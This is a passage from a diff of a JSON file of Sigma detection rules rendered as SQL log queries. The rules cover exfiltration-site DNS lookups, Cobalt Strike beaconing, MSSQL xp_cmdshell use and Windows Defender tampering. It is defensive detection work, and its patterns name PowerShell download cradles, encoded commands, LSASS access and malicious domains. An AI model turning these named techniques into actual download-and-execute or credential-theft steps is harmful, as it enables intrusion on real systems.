LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", - "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "status": "test", - "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1006" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '9' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((Image LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image IN ('System', 'Registry')) OR (Image LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\thor.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND Image LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND Image LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR Image LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": 
"dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - 
"id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "title": "Windows Defender Malware Detection History Deletion", + "id": "2afe6582-e149-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "author": "Cian Heasley", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Deletion of Defender malware detections history for legitimate reasons" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_history_delete.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects the restoration of files from the defender quarantine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.exfiltration", - 
"attack.t1567.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": 
"dns_query_win_susp_ldap.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "status": "experimental", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.defense_evasion", + "attack.t1562.001" ], 
"falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "DNS Query To 
Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Administrator might try to disable defender features during testing (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName 
LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of 
TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its 